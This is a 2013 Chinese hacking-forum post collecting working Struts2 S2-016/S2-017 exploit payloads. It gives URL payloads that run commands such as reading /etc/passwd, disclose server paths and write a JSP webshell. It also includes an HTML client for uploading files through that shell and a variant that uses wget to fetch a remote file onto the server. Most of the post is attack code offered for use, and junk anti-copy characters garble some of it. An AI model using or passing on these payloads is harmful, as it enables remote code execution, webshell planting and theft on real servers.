中国网络渗透测试联盟

标题: Struts2 S2-016/S2-017漏洞执行代码 [打印本页]
作者: admin    时间: 2013-7-18 23:03
标题: Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
9 q0 d# L; [. e# F7 p/ w  y* D  J) k
喜欢就点一下感谢吧^_^
9 N( ]8 {) S. S2 M! B. {
% Y0 G9 |% W: B1 u9 M8 ]+ Q0 \- |带回显命令执行:
2 [2 w( ^9 X$ n% Z! R' ^+ a$ P1 Y  k. i: H, p9 _
http://www.example.com/struts2-blank/example/X.action?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}0 t- G$ {/ a! C8 B

: {0 A$ r$ \! C, L
1 G+ |0 h, Y& u! m! _: n' r# S# k! m4 K  z! j; l# ^
, ^; b7 C+ D% U

2 I7 B. Y0 E! W/ t- |/ s) T: s) g! T% r: B& K9 \: u& e0 \4 x
, {1 D" `* a) A
爆路径:+ c9 z( k) u) c' Z3 f

+ x2 e$ I: p; E+ N7 Nhttp://www.example.com/struts2-b ... 8%29.close%28%29%7D1 [. J: L+ u$ ]0 ^7 e
& \; g: Z' w, j: V% v  z  Y
( U7 t9 s1 |, c0 {5 O" U; `
! w  a; b1 B& }/ v5 h6 A
& N/ p8 F) T& L# C+ U

+ ~0 N! O2 I  B+ E* X9 [2 O写文件:
/ }1 Y5 w) A  g( J- D2 k: k0 k, P8 m$ {5 x
http://www.example.com/struts2-blank/example/X.action?redirect:${
5 K5 b2 D4 o1 O" y: `. |; T$ P
0 x4 Y% R+ Q- c! A%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),: [2 t7 E! z4 {! g1 }5 P. o$ c, C

5 C/ z1 P& E9 t%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
! k- S- |% q  H8 V$ Q
9 `6 D  p, \: X1 Cnew+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()& }" H  u9 K( r$ W, V" r

+ l) i2 z0 T* P1 }5 ~8 ]; J}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e, ~) g. K9 p4 \1 m5 t$ i
) g6 e' L, n  [* j$ G- X, }
) I9 M/ n) i; H' x& ^, X

3 C7 [+ v: y. y( D% `% ]: U写入的文件内容:
! C# Y8 ?" C& I/ X% ^9 d
( a! n  G  _( O+ ]# d& J- I$ Z<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>      6 n5 ~! g" V+ B) a7 u6 x8 B, U
; _. r0 A5 @1 x  H( K  ?
其实就是一个jsp的小马,需要客户端配合                                                                                 
: i2 W' b% x) N, t& e& w
9 C' w+ g/ ]% y9 }5 V/ i% F函数f是文件名,t是内容+ M6 W3 r5 {- [( I% @1 I
: r) {+ M" G# z. J$ F9 J; `6 G( g4 z
客户端:
" H8 Q, `: g# W2 ^) \
8 S" O* U$ D# w8 Y4 }- D% Q<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
( {$ W, ~  d& G; i$ C
$ g6 x3 V$ K1 W! L3 ?8 n0 ]0 Q- T& g<textarea name=t cols=120 rows=10 width=45>your code</textarea>6 B: t# j8 u( Z: g% T3 U

; b( d6 ^* s) m; v, J* t<center>" x* r: a' v7 w

# C2 K7 d+ b1 _# v! i/ J' |
$ K  q% S+ `% \7 v, I4 r. W- F2 X0 C$ G
<input type=submit value="提交"># Z) W  O! @1 v! Y6 D

) o2 `9 ?: h, r</form>( {' y( u8 r' |' e

/ g  ]1 x( f9 h: S4 }就在当前目录建立一个fjp.jsp9 P1 P$ q3 r# c4 s

+ z' \' \( Y: yshell:http://www.example.com/struts2-blank/example/fjp.jsp. j( V) K8 \  L( U& N, p6 ~

# n, N% \' x* b4 P: z. y  i0 h, i

0 z) B: ]4 X" ]& q+ e* O* D还有@园长的一个客户端:
/ U0 x8 L! |/ G4 y% X4 G2 r( H( h1 Z" ~2 c
<html>
) h" z& M9 h: I
  l3 ^  R: d7 U; D7 Q" b<head>
) g- Y* ]8 N& [* }) _+ a
+ }5 R8 L/ Q8 P' d3 H/ I<meta http-equiv="content-type" content="text/html;charset=utf-8">
& R2 b/ f% O. G1 D' v7 S0 b/ V- L) h$ |& s' z
<title>jsp-园长</title>
: l& o+ a5 }  N8 P* l: X+ L( x! c9 `4 r4 Z& Z
</head>/ u& D8 B& X; s

7 v5 m, {$ s! {/ j+ o<style>
2 l$ v4 Y; U1 U  {4 D! G, S3 S
* r* T& ]* d: o.main{width:980px;height:600px;margin:0 auto;}1 H+ m) x5 ^% Q3 q3 n% y
9 L8 P+ Q" B" l! s* w
.url{width:300px;}
7 Z% C. k. y9 V2 H2 Y4 f
  ^* o; B& m/ v% A- v.fn{width:60px;}
3 m$ }# J2 B- U6 Z; `5 f/ ^
8 J3 F' ?+ e$ w( Z: X' c: Z* D2 N.content{width:80%;height:60%;}
3 \% E4 K. g: C. G7 x
1 A0 d. R+ k7 l</style>
2 d; G% K9 @. Z$ \: B; O- |" D& P" Y
<script>
8 I6 Y" L% V5 B9 S8 \' w( [6 Z4 `3 `# i2 o5 |
  function upload(){
0 ]) I- d5 I. K5 e$ _8 W  p; u$ Z2 N2 [, J: _( ?& }
    var url = document.getElementById('url').value,! X( h) H6 ]0 K- L# l# r8 C

3 p1 R9 w! o: O, A. g      content = document.getElementById('content').value,
% h/ l, v* m/ b  @/ M
' G, I! y, q$ F* d/ q      fileName = document.getElementById('fn').value,; n/ C. q: y& l: j) H' |

/ ]( {; [4 c, T; B! J      form = document.getElementById('fm');- R) b3 Q  E( {
9 W4 e' x% O3 P; H' w) A6 s
    if(url.length == 0){4 h0 {# m0 X# d$ \

. C$ K) @7 m8 P% K" f* L      alert("Url not allowd empty!");
0 R3 p3 T  r4 ?( w* Y5 q4 J, H' ~, h8 t
# Z- m7 t" u0 `/ a* n1 ~      return ;
% v6 z4 N. U/ n' o; l" s$ i& [2 U( @+ Z- s
    }
3 t0 `9 f2 J/ A. L' Q8 m( A- Q
& G5 R) ?& x. r    if(content.length == 0){
  y+ k- c7 Z  \
5 J# B! x4 a' D( X1 }7 e      alert("Content not allowd empty!");5 G: M4 _, l9 m; f
0 S. p" U2 o  Y# ~5 I* _5 ?) ]% N
      return ;
7 D; w' |9 C6 ?" y6 H) z
% h* `) l1 N3 Y/ o8 s6 w7 f    }
, ~2 Y. x3 H& Q* a1 O. [2 F  j5 G/ Y) P; s! P. u8 d& l
    if(fileName.length == 0){
, j$ }, K1 p( [& C. }% H7 Y
& b% P4 w' B/ D5 K      alert("FileName not allowd empty!");
) P- T2 t: [% E  ?7 M/ W4 q# |8 p1 R5 f, J4 J- x
      return ;
" Y/ V' y! k1 [! l% H# l0 |4 y. o# |( ]
    }1 |1 s% O# I- ]( k& X

' S4 T* D; T- j2 _1 w    form.action = url;" T; Y0 m* K- }1 K1 E, d/ ?
, R& I7 ~+ D2 l9 l% U
    form.submit();
; S- Z* P- x$ W9 @6 l" n" C3 h
$ Z( c" i. K  Y2 e  g8 Q! q  }
$ m! Y/ ~0 r& e) S$ g8 ^/ d: j* e0 ?- y- h
</script>
1 c/ B2 a/ B2 a2 V9 ^
5 P) f- H% j6 O: u" G" h<body>; v7 ^- L- F3 z

% s$ \5 x( R! h+ P6 V7 _<div class="main">
8 N2 S5 c) G& U/ O2 N3 w6 u# W3 @+ D0 X; ~+ A6 O
  <form id="fm" method="post">  
+ h0 N  j8 i. I* K6 P/ S" V6 u. H9 K8 M  o1 F
    URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>  
+ l# H2 k  e% q2 ]1 ^" l% S4 j
    FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />  
% A/ u- J2 n8 Z/ f# R' E& L( g. q6 o4 L
    <a href="javascript:upload();">Upload</a>
8 v( P7 w+ g2 {! J4 B
" o4 T; l2 ~( r9 P1 D1 c1 Z& q9 d4 }- Z% Q* E, l

! p, y% s& m! k# X    <textarea id="content" class="content" name="t" ></textarea>3 ~2 K  [# b1 w% k

( k' K) J. Z4 u, C  </form>& D& f/ y2 R- p9 a1 x" ]) L

) b" Z8 C3 ~3 H: x; t' S</div>8 H  O, \; }* w# C* t' S; y

5 a# Q  V& Z  ~5 S) [3 J</body>3 J7 O; E$ a# m$ d
4 s- G3 b1 x3 n' s! S2 j
</html>
. h' m9 T2 ]* Y  y* w: q+ P: ]1 {7 P4 Z3 m

; G3 \; H6 t: b  s7 m8 D$ l; F5 A/ g  g. f
还有@X发的一个wget的getshell& m' q/ d& I7 y! A; v

  E% a; [2 \: ~1 H?redirect{%23a%3d(new  java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}+ h' Z1 m  }: U0 U0 S
; A) H6 n7 e8 Q% n* A/ I% ]
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
+ [  O; m6 |. e' y$ E* Z复制代码



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2